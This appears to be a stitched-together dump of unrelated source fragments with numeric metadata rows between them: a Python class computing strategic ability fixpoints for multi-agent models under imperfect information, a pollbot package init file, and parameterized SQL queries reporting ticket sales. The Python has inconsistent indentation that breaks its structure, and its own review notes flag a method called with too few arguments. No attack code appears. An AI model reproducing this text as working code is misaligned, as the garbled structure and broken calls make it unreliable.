self.reverse_transitions = [[] for _ in itertools.repeat(None, self.number_of_states)]
def init_states(self):
self.pre_states = [set() for _ in itertools.repeat(None, self.number_of_states)]
def init_actions(self):
self.agents_actions = [[] for _ in itertools.repeat(None, self.number_of_agents)]
def init_epistemic_relation(self):
self.epistemic_class_membership = create_array_of_size(self.number_of_agents, [])
self.epistemic_class_disjoint = [DisjointSet(self.number_of_states) for _ in
itertools.repeat(None, self.number_of_agents)]
self.imperfect_information = create_array_of_size(self.number_of_agents, [])
for i in range(0, self.number_of_agents):
self.imperfect_information[i] = []
self.epistemic_class_membership[i] = [-1 for _ in itertools.repeat(None, self.number_of_states)]
def add_action(self, agent, action):
self.agents_actions[agent].append(action)
def enlarge_transitions(self, size):
if len(self.transitions) <= size:
to_add = size - len(self.transitions) + 1
for i in range(0, to_add):
self.transitions.append([])
self.reverse_transitions.append([])
self.pre_states.append(set())
def max(self, a, b):
if a > b:
return a
else:
return b
    def add_transition(self, from_state, to_state, actions):
        """Add a joint-action transition (and its reverse) if not already present.

        ``actions`` is the joint action vector, one entry per agent. The
        exact-dict equality test dedupes identical transitions only; the
        reverse list and pre-state set are updated in lockstep.
        """
        self.enlarge_transitions(self.max(from_state, to_state))
        if {'nextState': to_state, 'actions': actions} not in self.transitions[from_state]:
            self.transitions[from_state].append({'nextState': to_state, 'actions': actions.copy()})
            self.reverse_transitions[to_state].append({'nextState': from_state, 'actions': actions.copy()})
            self.pre_states[to_state].add(from_state)
    def add_epistemic_class(self, agent_number, epistemic_class):
        """Register a set of states that *agent_number* cannot distinguish.

        Updates the membership map, merges the states in the agent's
        disjoint-set structure, and precomputes uniform reachability for the
        new class via ``find_where_can_go``.
        """
        self.imperfect_information[agent_number].append(set(epistemic_class))
        epistemic_class_number = len(self.imperfect_information[agent_number]) - 1
        first_state = next(iter(epistemic_class))
        for state in epistemic_class:
            self.epistemic_class_membership[agent_number][state] = epistemic_class_number
            self.epistemic_class_disjoint[agent_number].union(first_state, state)
        self.find_where_can_go(epistemic_class, epistemic_class_number, agent_number)
    def find_where_can_go(self, epistemic_class, epistemic_class_number, agent_number):
        """Cache, per action, where the whole epistemic class can go.

        For each of the agent's actions, computes the union of successors of
        every state in the class under that action; the cached set is emptied
        if some state of the class has no transition labelled with the action
        (the agent cannot play it uniformly).
        """
        if len(self.can_go_there[agent_number]) == 0:
            # Lazily allocate one action->states dict per state slot.
            self.can_go_there[agent_number] = [{} for _ in itertools.repeat(None, self.number_of_states)]
        for action in self.agents_actions[agent_number]:
            can_go_temp = set()
            is_first = True
            for state in epistemic_class:
                can_go_state_temp = set()
                for transition in self.transitions[state]:
                    if transition['actions'][agent_number] == action:
                        can_go_state_temp.add(transition['nextState'])
                if is_first:
                    is_first = False
                    can_go_temp = set(can_go_state_temp)
                else:
                    can_go_temp |= can_go_state_temp
                if len(can_go_state_temp) == 0:
                    # Action unavailable in some class member: whole entry is void.
                    can_go_temp = set()
                    break
            self.can_go_there[agent_number][epistemic_class_number][action] = can_go_temp
    def basic_formula(self, agent_number, winning_state):
        """One-step pre-image for a single agent under imperfect information.

        Returns the predecessors of ``winning_state`` from which the agent can
        also reach it from every indistinguishable state.

        NOTE(review): ``self.imperfect_information[agent_number][state]`` is
        indexed here by a *state* id, while elsewhere it is indexed by an
        epistemic-class number — confirm intent.
        NOTE(review): ``is_reachable_by_agent`` is called with three arguments
        but is defined with four (action, from_state, is_winning_state,
        agent); this call would raise TypeError if executed.
        """
        result_states = []
        for state in self.pre_states[winning_state]:
            ok = True
            for same_state in self.imperfect_information[agent_number][state]:
                if not self.is_reachable_by_agent(same_state, winning_state, agent_number):
                    ok = False
                    break
            if ok:
                result_states.append(state)
        return result_states
def is_reachable_by_agents_in_set(self, action, from_state, winning_states, agents):
action_ok = False
for transition in self.transitions[from_state]:
if self.is_possible_transition(agents, action, transition):
action_ok = True
if not (transition['nextState'] in winning_states):
return False
return action_ok
def is_reachable_by_agent_disjoint(self, action, from_state, agent, first_winning, winning_states_disjoint):
action_ok = False
for transition in self.transitions[from_state]:
if transition['actions'][agent] == action:
action_ok = True
if not winning_states_disjoint.is_in_union(first_winning, transition['nextState']):
return False
return action_ok
def is_reachable_by_agent(self, action, from_state, is_winning_state, agent):
action_ok = False
for transition in self.transitions[from_state]:
if transition['actions'][agent] == action:
action_ok = True
if not is_winning_state[transition['nextState']]:
return False
return action_ok
def is_reachable_by_agent_in_set(self, action, from_state, winning_states, agent):
action_ok = False
for transition in self.transitions[from_state]:
if transition['actions'][agent] == action:
action_ok = True
if not (transition['nextState'] in winning_states):
return False
return action_ok
def get_agents_actions(self, agents):
actions = []
for agent in agents:
actions.append(self.agents_actions[agent])
return actions
    def basic_formula_one_agent_multiple_states_disjoint(self, agent, current_states, first_winning,
                                                         winning_states_disjoint,
                                                         custom_can_go_there):
        """One fixed-point step using the disjoint-set winning representation.

        For each epistemic class in the pre-image of ``current_states``, the
        class is merged into the winning component when some action takes the
        whole class into that component. Returns a dict with the newly-won
        states ('result') and whether any merge happened ('modified').
        """
        result_states = []
        actions = self.agents_actions[agent]
        preimage = set()
        modified = False
        # Collect the epistemic classes of all predecessors of current winners.
        for winning_state in current_states:
            for pre_state in self.pre_states[winning_state]:
                preimage.add(self.epistemic_class_membership[agent][pre_state])
        first_winning = winning_states_disjoint.find(first_winning)
        for state_epistemic_class in preimage:
            state = next(iter(self.imperfect_information[agent][state_epistemic_class]))
            state = winning_states_disjoint.find(state)
            if state == first_winning:
                continue
            if state_epistemic_class == -1:
                print("ERROR")  # NOTE(review): debug print for unassigned classes
                same_states = [state]
            else:
                same_states = self.imperfect_information[agent][state_epistemic_class]
            for action in actions:
                states_can_go = custom_can_go_there[state_epistemic_class][action]
                if len(states_can_go) == 0:
                    continue
                is_ok = True
                new_states_can_go = set()
                # Compress the cached successor set against the current partition.
                for state_can in states_can_go:
                    new_state_can = winning_states_disjoint.find(state_can)
                    if first_winning != new_state_can:
                        is_ok = False
                    new_states_can_go.add(new_state_can)
                custom_can_go_there[state_epistemic_class][action] = new_states_can_go
                if is_ok:
                    result_states.extend(same_states)
                    winning_states_disjoint.union(first_winning, state)
                    first_winning = winning_states_disjoint.find(first_winning)
                    modified = True
                    break
        return {'result': result_states, 'modified': modified}
    def basic_formula_one_agent_multiple_states_disjoint_mcmas_approach(self, agent, current_states, first_winning,
                                                                        winning_states_disjoint,
                                                                        custom_can_go_there):
        """MCMAS-style variant of the disjoint-set fixed-point step.

        An epistemic class is won when some action exists whose successors,
        from every state of the class, all lie in the winning component.
        Returns {'result': newly-won states, 'modified': whether any merge
        happened}.

        NOTE(review): ``actions`` and ``custom_can_go_there`` are unused here.
        """
        result_states = []
        actions = self.agents_actions[agent]
        preimage = set()
        modified = False
        for winning_state in current_states:
            for pre_state in self.pre_states[winning_state]:
                preimage.add(self.epistemic_class_membership[agent][pre_state])
        first_winning = winning_states_disjoint.find(first_winning)
        for state_epistemic_class in preimage:
            state = next(iter(self.imperfect_information[agent][state_epistemic_class]))
            state = winning_states_disjoint.find(state)
            if state == first_winning:
                continue
            if state_epistemic_class == -1:
                print("ERROR")  # NOTE(review): debug print for unassigned classes
                same_states = [state]
            else:
                same_states = self.imperfect_information[agent][state_epistemic_class]
            all_actions = set()
            bad_actions = set()
            for same_state in same_states:
                for transition in self.transitions[same_state]:
                    all_actions.add(transition['actions'][agent])
                    if winning_states_disjoint.find(transition['nextState']) != first_winning:
                        bad_actions.add(transition['actions'][agent])
            # Any action never leading outside the winning component wins the class.
            all_actions -= bad_actions
            if len(all_actions) > 0:
                result_states.extend(same_states)
                winning_states_disjoint.union(first_winning, state)
                first_winning = winning_states_disjoint.find(first_winning)
                modified = True
        return {'result': result_states, 'modified': modified}
    def basic_formula_one_agent_multiple_states(self, agent, current_states, is_winning_state):
        """One pre-image step for a single agent under imperfect information.

        An epistemic class is won when, for some action, every state of the
        class either reaches winning states directly or can (transitively,
        via the expansion loop below) stay within already-good class members.
        Marks the newly-won states in ``is_winning_state`` and returns them.
        """
        result_states = set()
        actions = self.agents_actions[agent]
        preimage = []
        for winning_state in current_states:
            preimage += self.pre_states[winning_state]
        unique(preimage)
        for state in preimage:
            state_epistemic_class = self.epistemic_class_membership[agent][state]
            if state_epistemic_class == -1:
                # State outside any epistemic class: treat it as a singleton.
                same_states = [state]
            else:
                same_states = self.imperfect_information[agent][state_epistemic_class]
            for action in actions:
                good_states = []
                number_of_good = 0
                should_break = False
                is_good_state = {}
                for same_state in same_states:
                    is_good_state[same_state] = False
                    if self.is_reachable_by_agent(action, same_state, is_winning_state, agent):
                        good_states.append(same_state)
                        is_good_state[same_state] = True
                        number_of_good += 1
                    elif not self.is_reachable_by_agent_in_set(action, same_state, same_states, agent):
                        # Cannot even stay inside the class: this action fails.
                        should_break = True
                    # else: # for standard model
                    #     should_break = True
                if should_break:
                    continue
                # Propagate "good" through states whose successors land on
                # already-good class members, until a fixed point.
                modified = True
                while modified:
                    modified = False
                    for same_state in same_states:
                        if is_good_state[same_state]:
                            continue
                        if self.is_reachable_by_agent_in_set(action, same_state, good_states, agent):
                            good_states.append(same_state)
                            is_good_state[same_state] = True
                            number_of_good += 1
                            modified = True
                if number_of_good == len(same_states):
                    result_states.update(same_states)
                    break
            # Avoid reprocessing other members of the same class.
            for same_state in same_states:
                if same_state != state and same_state in preimage:
                    preimage.remove(same_state)
        for state_number in result_states:
            is_winning_state[state_number] = True
        return result_states
    def basic_formula_one_agent_multiple_states_mcmas_approach(self, agent, current_states, is_winning_state):
        """MCMAS-style pre-image step for a single agent.

        An epistemic class is won when some action, from every state of the
        class, leads only to states already marked winning. Marks the newly
        won states in ``is_winning_state`` and returns them.

        NOTE(review): the local ``actions`` is unused.
        """
        result_states = set()
        actions = self.agents_actions[agent]
        preimage = []
        for winning_state in current_states:
            preimage += self.pre_states[winning_state]
        unique(preimage)
        for state in preimage:
            state_epistemic_class = self.epistemic_class_membership[agent][state]
            if state_epistemic_class == -1:
                same_states = [state]
            else:
                same_states = self.imperfect_information[agent][state_epistemic_class]
            all_actions = set()
            bad_actions = set()
            for same_state in same_states:
                for transition in self.transitions[same_state]:
                    all_actions.add(transition['actions'][agent])
                    if not is_winning_state[transition['nextState']]:
                        bad_actions.add(transition['actions'][agent])
            all_actions -= bad_actions
            if len(all_actions) > 0:
                result_states.update(same_states)
            # Avoid reprocessing other members of the same class.
            for same_state in same_states:
                if same_state != state and same_state in preimage:
                    preimage.remove(same_state)
        for state_number in result_states:
            is_winning_state[state_number] = True
        return result_states
def basic_formula_multiple_agents_and_states_perfect_information(self, agents, current_states, is_winning_state):
result_states = set()
actions = self.get_agents_actions(agents)
winning_states_reverse = []
for winning_state in current_states:
winning_states_reverse += self.pre_states[winning_state]
unique(winning_states_reverse)
for state in winning_states_reverse:
for action in itertools.product(*actions):
if self.is_reachable_by_agents(action, state, is_winning_state, agents):
result_states.add(state)
for state_number in result_states:
is_winning_state[state_number] = True
return result_states
def basic_formula_one_agent_multiple_states_perfect_information(self, agent, current_states, is_winning_state):
result_states = set()
actions = self.agents_actions[agent]
winning_states_reverse = []
for winning_state in current_states:
winning_states_reverse += self.pre_states[winning_state]
unique(winning_states_reverse)
for state in winning_states_reverse:
for action in actions:
if self.is_reachable_by_agent(action, state, is_winning_state, agent):
result_states.add(state)
for state_number in result_states:
is_winning_state[state_number] = True
return result_states
def basic_formula_one_agent_multiple_states_perfect_information_mcmas_approach(self, agent, current_states, is_winning_state):
result_states = set()
actions = self.agents_actions[agent]
winning_states_reverse = []
for winning_state in current_states:
winning_states_reverse += self.pre_states[winning_state]
unique(winning_states_reverse)
for state in winning_states_reverse:
all_actions = set()
bad_actions = set()
for transition in self.transitions[state]:
all_actions.add(transition['actions'][agent])
if not is_winning_state[transition['nextState']]:
bad_actions.add(transition['actions'][agent])
all_actions -= bad_actions
if len(all_actions) > 0:
result_states.add(state)
for state_number in result_states:
is_winning_state[state_number] = True
return result_states
    def minimum_formula_multiple_agents_and_states(self, agents, winning_states):
        """Least fixed point: states from which the coalition can force
        reaching ``winning_states``.

        Repeatedly applies ``basic_formula_multiple_agents_and_states``
        (defined elsewhere in this module) until no new state is added.
        """
        result_states = set()
        result_states.update(winning_states)
        result_states_length = len(result_states)
        number_of_iterations = 0
        current_states = winning_states[:]
        is_winning_state = [False for _ in itertools.repeat(None, self.number_of_states)]
        for state_number in winning_states:
            is_winning_state[state_number] = True
        while True:
            current_states = self.basic_formula_multiple_agents_and_states(agents, current_states, is_winning_state)
            result_states.update(current_states)
            new_results_states_length = len(result_states)
            if result_states_length == new_results_states_length:
                break
            result_states_length = new_results_states_length
            number_of_iterations += 1
        print('Minimum formula iterations:', number_of_iterations)
        return result_states
def minimum_formula_one_agent_multiple_states_disjoint(self, agent, winning_states):
    """Least fixpoint for one agent under imperfect information (disjoint sets).

    Merges every epistemic class that lies entirely inside *winning_states*
    into one representative, then iterates the disjoint-set basic formula
    until it reports no modification.  Returns the set of winning state
    numbers ([] for empty input, preserving the original contract).

    Fix: membership tests against *winning_states* were O(n) list scans inside
    a nested loop; they now hit a precomputed set (same semantics, O(1)).
    """
    if len(winning_states) == 0:
        return []
    result_states = set()
    result_states.update(winning_states)
    number_of_iterations = 0
    current_states = winning_states[:]
    winning_states_set = set(winning_states)  # O(1) membership below
    winning_states_disjoint = DisjointSet(0)
    winning_states_disjoint.subsets = copy.deepcopy(self.epistemic_class_disjoint[agent].subsets)
    first_winning = winning_states_disjoint.find(winning_states[0])
    # Epistemic classes touched by any winning state.
    epistemic_class_numbers = set()
    for state_number in winning_states:
        epistemic_class_number = self.epistemic_class_membership[agent][state_number]
        epistemic_class_numbers.add(epistemic_class_number)
    for epistemic_class_number in epistemic_class_numbers:
        epistemic_states = self.imperfect_information[agent][epistemic_class_number]
        is_ok = True
        for epistemic_state in epistemic_states:
            state_number = epistemic_state
            if epistemic_state not in winning_states_set:
                is_ok = False
                break
        if is_ok:
            # NOTE(review): unions with the *last* state examined in the class;
            # relies on `state_number` surviving the loop — kept as-is.
            winning_states_disjoint.union(first_winning, state_number)
    custom_can_go_there = self.can_go_there[agent][:]
    while True:
        formula_result = self.basic_formula_one_agent_multiple_states_disjoint(agent, current_states, first_winning,
                                                                               winning_states_disjoint,
                                                                               custom_can_go_there)
        current_states = formula_result['result']
        modified = formula_result['modified']
        result_states.update(current_states)
        if not modified:
            break
        number_of_iterations += 1
    print('Minimum formula iterations:', number_of_iterations)
    return result_states
def minimum_formula_one_agent_multiple_states_disjoint_mcmas_approach(self, agent, winning_states):
    """MCMAS-style least fixpoint for one agent (imperfect info, disjoint sets).

    Identical setup to ``minimum_formula_one_agent_multiple_states_disjoint``
    but iterates the MCMAS variant of the disjoint-set basic formula.
    Returns the set of winning state numbers ([] for empty input).

    Fix: membership tests against *winning_states* were O(n) list scans inside
    a nested loop; they now hit a precomputed set (same semantics, O(1)).
    """
    if len(winning_states) == 0:
        return []
    result_states = set()
    result_states.update(winning_states)
    number_of_iterations = 0
    current_states = winning_states[:]
    winning_states_set = set(winning_states)  # O(1) membership below
    winning_states_disjoint = DisjointSet(0)
    winning_states_disjoint.subsets = copy.deepcopy(self.epistemic_class_disjoint[agent].subsets)
    first_winning = winning_states_disjoint.find(winning_states[0])
    # Epistemic classes touched by any winning state.
    epistemic_class_numbers = set()
    for state_number in winning_states:
        epistemic_class_number = self.epistemic_class_membership[agent][state_number]
        epistemic_class_numbers.add(epistemic_class_number)
    for epistemic_class_number in epistemic_class_numbers:
        epistemic_states = self.imperfect_information[agent][epistemic_class_number]
        is_ok = True
        for epistemic_state in epistemic_states:
            state_number = epistemic_state
            if epistemic_state not in winning_states_set:
                is_ok = False
                break
        if is_ok:
            # NOTE(review): unions with the *last* state examined in the class;
            # relies on `state_number` surviving the loop — kept as-is.
            winning_states_disjoint.union(first_winning, state_number)
    custom_can_go_there = self.can_go_there[agent][:]
    while True:
        formula_result = self.basic_formula_one_agent_multiple_states_disjoint_mcmas_approach(agent, current_states, first_winning,
                                                                                              winning_states_disjoint,
                                                                                              custom_can_go_there)
        current_states = formula_result['result']
        modified = formula_result['modified']
        result_states.update(current_states)
        if not modified:
            break
        number_of_iterations += 1
    print('Minimum formula iterations:', number_of_iterations)
    return result_states
def minimum_formula_one_agent_multiple_states(self, agent, winning_states):
    """Least fixpoint of the one-step formula for a single agent.

    Repeatedly applies ``basic_formula_one_agent_multiple_states`` starting
    from *winning_states* until the reached set stops growing.  Prints the
    number of productive iterations and returns the reached set.
    """
    reached = set(winning_states)
    frontier = winning_states[:]
    # Boolean mask over all states marking the winning region so far.
    marked_winning = [False] * self.number_of_states
    for state in winning_states:
        marked_winning[state] = True
    previous_size = len(reached)
    passes = 0
    while True:
        frontier = self.basic_formula_one_agent_multiple_states(agent, frontier, marked_winning)
        reached.update(frontier)
        if len(reached) == previous_size:
            break
        previous_size = len(reached)
        passes += 1
    print('Minimum formula iterations:', passes)
    return reached
def minimum_formula_multiple_agents_and_states_perfect_information(self, agents, winning_states):
    """Least fixpoint for a coalition under perfect information.

    Same iteration scheme as the imperfect-information variant, driving
    ``basic_formula_multiple_agents_and_states_perfect_information`` until
    no new state is reached.  Prints the iteration count and returns the set.
    """
    reached = set(winning_states)
    frontier = winning_states[:]
    # Boolean mask over all states marking the winning region so far.
    marked_winning = [False] * self.number_of_states
    for state in winning_states:
        marked_winning[state] = True
    previous_size = len(reached)
    passes = 0
    while True:
        frontier = self.basic_formula_multiple_agents_and_states_perfect_information(agents, frontier, marked_winning)
        reached.update(frontier)
        if len(reached) == previous_size:
            break
        previous_size = len(reached)
        passes += 1
    print('Minimum formula iterations:', passes)
    return reached
def minimum_formula_one_agent_multiple_states_perfect_information(self, agent, winning_states):
    """Least fixpoint for one agent under perfect information.

    Drives ``basic_formula_one_agent_multiple_states_perfect_information``
    from *winning_states* until the reached set stops growing.  Prints the
    iteration count and returns the reached set of state numbers.
    """
    reached = set(winning_states)
    frontier = winning_states[:]
    # Boolean mask over all states marking the winning region so far.
    marked_winning = [False] * self.number_of_states
    for state in winning_states:
        marked_winning[state] = True
    previous_size = len(reached)
    passes = 0
    while True:
        frontier = self.basic_formula_one_agent_multiple_states_perfect_information(agent, frontier, marked_winning)
        reached.update(frontier)
        if len(reached) == previous_size:
            break
        previous_size = len(reached)
        passes += 1
    print('Minimum formula iterations:', passes)
    return reached
def minimum_formula_one_agent_multiple_states_perfect_information_mcmas_approach(self, agent, winning_states):
    """MCMAS-style least fixpoint for one agent under perfect information.

    Identical iteration scheme to the non-MCMAS variant, but each step calls
    ``basic_formula_one_agent_multiple_states_perfect_information_mcmas_approach``.
    Prints the iteration count and returns the reached set of state numbers.
    """
    reached = set(winning_states)
    frontier = winning_states[:]
    # Boolean mask over all states marking the winning region so far.
    marked_winning = [False] * self.number_of_states
    for state in winning_states:
        marked_winning[state] = True
    previous_size = len(reached)
    passes = 0
    while True:
        frontier = self.basic_formula_one_agent_multiple_states_perfect_information_mcmas_approach(agent, frontier, marked_winning)
        reached.update(frontier)
        if len(reached) == previous_size:
            break
        previous_size = len(reached)
        passes += 1
    print('Minimum formula iterations:', passes)
    return reached
def maximum_formula_one_agent_multiple_states(self, agent, winning_states):
    """Greatest-fixpoint counterpart of the minimum formula for one agent.

    Starts from *winning_states* and repeatedly applies the one-step basic
    formula, each round keeping only the states confirmed again via the
    module-level ``and_operator`` (presumably a set intersection — TODO
    confirm against its definition).  Stops when the retained set no longer
    shrinks; prints the iteration count and returns the final set.
    """
    result_states = set()
    result_states.update(winning_states)
    result_states_length = len(result_states)
    number_of_iterations = 0
    current_states = winning_states[:]
    # Boolean mask over all states: True while a state is still considered winning.
    is_winning_state = [False for _ in itertools.repeat(None, self.number_of_states)]
    for state_number in winning_states:
        is_winning_state[state_number] = True
    while True:
        current_states = self.basic_formula_one_agent_multiple_states(agent, current_states, is_winning_state)
        # Retain only states that survived this round.
        result_states = set(and_operator(result_states, current_states))
        if result_states_length == len(result_states):
            break
        # Un-mark retained states that were not re-confirmed this round so the
        # next pass treats them as losing (order matters: runs after the
        # convergence check, before the next basic-formula call).
        for state_number in result_states:
            if state_number not in current_states:
                is_winning_state[state_number] = False
        result_states_length = len(result_states)
        number_of_iterations += 1
    print('Maximum formula iterations:', number_of_iterations)
    return result_states
def maximum_formula_one_agent_multiple_states_perfect_information(self, agent, winning_states):
    """Greatest fixpoint for one agent under perfect information.

    Same shrinking iteration as ``maximum_formula_one_agent_multiple_states``
    but each step uses the perfect-information basic formula.  Each round
    keeps only states re-confirmed via the module-level ``and_operator``
    (presumably a set intersection — TODO confirm).  Prints the iteration
    count and returns the final set of state numbers.
    """
    result_states = set()
    result_states.update(winning_states)
    result_states_length = len(result_states)
    number_of_iterations = 0
    current_states = winning_states[:]
    # Boolean mask over all states: True while a state is still considered winning.
    is_winning_state = [False for _ in itertools.repeat(None, self.number_of_states)]
    for state_number in winning_states:
        is_winning_state[state_number] = True
    while True:
        current_states = self.basic_formula_one_agent_multiple_states_perfect_information(agent, current_states,
                                                                                          is_winning_state)
        # Retain only states that survived this round.
        result_states = set(and_operator(result_states, current_states))
        if result_states_length == len(result_states):
            break
        # Un-mark retained states that were not re-confirmed this round so the
        # next pass treats them as losing.
        for state_number in result_states:
            if state_number not in current_states:
                is_winning_state[state_number] = False
        result_states_length = len(result_states)
        number_of_iterations += 1
    print('Maximum formula iterations:', number_of_iterations)
    return result_states
def create_agents_actions_combinations(self, agents):
    """Return every joint action for *agents* as a list of tuples.

    Each tuple holds one action per agent, in the order the agents are given;
    the Cartesian product of their individual action lists.
    """
    per_agent_actions = [self.agents_actions[agent] for agent in agents]
    return list(itertools.product(*per_agent_actions))
def walk_perfect_information(self, agent_number):
    """Interactively simulate the model from state 0 (perfect information).

    Prints the current state and its outgoing transitions, then reads a
    transition index from stdin; -1 quits, and a state with no outgoing
    transitions ends the walk.  *agent_number* is unused in this variant
    (kept for signature symmetry with ``walk``).
    """
    print("#####################################################")
    print("Simulation")
    state = 0
    while True:
        print()
        print("Current state:", self.states[state])
        outgoing = self.transitions[state]
        if not outgoing:
            print("End")
            return
        print('Transitions:')
        for index, transition in enumerate(outgoing):
            print(str(index) + ":", transition)
        choice = int(input("Choose transition="))
        if choice == -1:
            print("End")
            return
        state = outgoing[choice]['nextState']
def walk(self, agent_number, print_state):
    """Interactive simulation under imperfect information for *agent_number*.

    At each step prints the current state via the *print_state* callback,
    then every state the agent cannot distinguish from it, then the outgoing
    transitions; reads a transition index from stdin (-1 quits).  Ends when
    the user quits or a dead-end state is reached.
    """
    print("#####################################################")
    print("Simulation")
    current = 0
    while True:
        print()
        print("Current state:")
        print_state(self.states[current])
        print("Epistemic states:")
        epistemic_class = self.epistemic_class_membership[agent_number][current]
        for look_alike in self.imperfect_information[agent_number][epistemic_class]:
            print_state(self.states[look_alike])
        outgoing = self.transitions[current]
        if not outgoing:
            print("End")
            return
        print('Transitions:')
        for index, transition in enumerate(outgoing):
            print(str(index) + ":", transition)
        choice = int(input("Choose transition="))
        if choice == -1:
            print("End")
            return
        current = outgoing[choice]['nextState']
@staticmethod
def is_possible_transition(agents, action, transition):
for i, j in zip(agents, range(0, len(agents))):
if transition['actions'][i] != action[j]:
return False
return True
| 40.602581
| 135
| 0.612991
| 3,450
| 31,467
| 5.213333
| 0.03971
| 0.072723
| 0.031135
| 0.036695
| 0.840042
| 0.79851
| 0.774436
| 0.745913
| 0.729845
| 0.720616
| 0
| 0.002691
| 0.314965
| 31,467
| 775
| 136
| 40.602581
| 0.831694
| 0.001907
| 0
| 0.701278
| 0
| 0
| 0.024743
| 0.003375
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063898
| false
| 0
| 0.004792
| 0
| 0.15016
| 0.049521
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5cb6a88b4bf6b01705fe513a02c5d1b806f44a29
| 351
|
py
|
Python
|
pollbot/models/__init__.py
|
3wille/ultimate-poll-bot
|
7a99659df463a891b20a1ab424665cd84d4242b4
|
[
"MIT"
] | null | null | null |
pollbot/models/__init__.py
|
3wille/ultimate-poll-bot
|
7a99659df463a891b20a1ab424665cd84d4242b4
|
[
"MIT"
] | null | null | null |
pollbot/models/__init__.py
|
3wille/ultimate-poll-bot
|
7a99659df463a891b20a1ab424665cd84d4242b4
|
[
"MIT"
] | null | null | null |
from pollbot.models.poll import Poll # noqa
from pollbot.models.poll_option import PollOption # noqa
from pollbot.models.reference import Reference # noqa
from pollbot.models.user import User # noqa
from pollbot.models.vote import Vote # noqa
from pollbot.models.update import Update # noqa
from pollbot.models.notification import Notification # noqa
| 43.875
| 59
| 0.820513
| 50
| 351
| 5.74
| 0.26
| 0.268293
| 0.414634
| 0.439024
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119658
| 351
| 7
| 60
| 50.142857
| 0.928803
| 0.096866
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7a3e4e910a0f7b86c400fb073649a07f5d62424b
| 1,975
|
py
|
Python
|
texas/queries.py
|
FirePonyCreativeSociety/blackrocktickets
|
8407cdf36b5bef990f6b1e1ea4ca6d1107611304
|
[
"Apache-2.0"
] | 15
|
2015-02-08T17:05:44.000Z
|
2019-09-22T16:06:13.000Z
|
texas/queries.py
|
FirePonyCreativeSociety/blackrocktickets
|
8407cdf36b5bef990f6b1e1ea4ca6d1107611304
|
[
"Apache-2.0"
] | 6
|
2021-06-11T17:41:36.000Z
|
2021-06-11T21:22:25.000Z
|
texas/queries.py
|
FirePonyCreativeSociety/blackrocktickets
|
8407cdf36b5bef990f6b1e1ea4ca6d1107611304
|
[
"Apache-2.0"
] | 6
|
2016-03-27T01:45:00.000Z
|
2021-01-07T15:31:45.000Z
|
# Raw SQL for occurrence-level sales reporting.  Every query takes a single
# occurrence id via the DB-API placeholder %s; doubled %% escapes literal
# percent signs for DATE_FORMAT.  Only purchases with status 'P' (presumably
# "paid" — confirm against the purchase model) are counted.

# Tickets sold per calendar day for one occurrence.
TICKETS_SOLD_BY_DAYS = """
SELECT DATE_FORMAT(p.purchase_date, '%%Y/%%m/%%d') AS 'purchase_date',
COUNT(DISTINCT tc.id) AS 'ticket_count'
FROM texas_occurrence o
INNER JOIN texas_purchase p ON p.occurrence_id = o.id
INNER JOIN texas_ticket tc ON tc.purchase_id = p.id
WHERE o.id = %s
AND p.status = 'P'
GROUP BY DATE_FORMAT(p.purchase_date, '%%Y/%%m/%%d')
ORDER BY p.purchase_date
"""
# Tickets sold per calendar month for one occurrence.
TICKETS_SOLD_BY_MONTH = """
SELECT DATE_FORMAT(p.purchase_date, '%%Y/%%m') AS 'purchase_month',
COUNT(DISTINCT tc.id) AS 'ticket_count'
FROM texas_occurrence o
INNER JOIN texas_purchase p ON p.occurrence_id = o.id
INNER JOIN texas_ticket tc ON tc.purchase_id = p.id
WHERE o.id = %s
AND p.status = 'P'
GROUP BY DATE_FORMAT(p.purchase_date, '%%Y/%%m')
ORDER BY p.purchase_date
"""
# Tickets sold per pricing tier, ordered by tier start date.
TICKETS_SOLD_BY_TIER = """
SELECT ti.label AS 'tier',
COUNT(DISTINCT tc.id) AS 'ticket_count'
FROM texas_occurrence o
INNER JOIN texas_purchase p ON p.occurrence_id = o.id
INNER JOIN texas_ticket tc ON tc.purchase_id = p.id
INNER JOIN texas_tier ti ON ti.id = tc.tier_id
WHERE o.id = %s
AND p.status = 'P'
GROUP BY ti.label
ORDER BY ti.start_date
"""
# Distribution of buyers by ticket count: for each per-user ticket total,
# how many users bought exactly that many (inner query aggregates per user).
USERS_BY_TICKET_COUNT = """
SELECT ticket_count AS 'tickets',
COUNT(user_id) AS 'user_count'
FROM (
SELECT COUNT(tc.id) AS 'ticket_count',
p.user_id
FROM texas_occurrence o
INNER JOIN texas_purchase p ON p.occurrence_id = o.id
INNER JOIN texas_ticket tc ON tc.purchase_id = p.id
WHERE o.id = %s
AND p.status = 'P'
GROUP BY p.user_id
) AS a
GROUP BY a.ticket_count
ORDER BY a.ticket_count
"""
# Average tickets per purchase, broken down by pricing tier.
AVG_TICKETS_BY_TIER = """
SELECT ti.label AS 'tier',
COUNT(DISTINCT tc.id) / COUNT(DISTINCT p.id) AS 'avg_tickets'
FROM texas_occurrence o
INNER JOIN texas_purchase p ON p.occurrence_id = o.id
INNER JOIN texas_ticket tc ON tc.purchase_id = p.id
INNER JOIN texas_tier ti ON ti.id = tc.tier_id
WHERE o.id = %s
AND p.status = 'P'
GROUP BY ti.label
ORDER BY ti.start_date
"""
| 29.477612
| 70
| 0.708861
| 363
| 1,975
| 3.663912
| 0.110193
| 0.081203
| 0.126316
| 0.084211
| 0.830827
| 0.818045
| 0.818045
| 0.818045
| 0.721805
| 0.721805
| 0
| 0
| 0.180253
| 1,975
| 66
| 71
| 29.924242
| 0.821495
| 0
| 0
| 0.693548
| 0
| 0
| 0.921519
| 0.056709
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
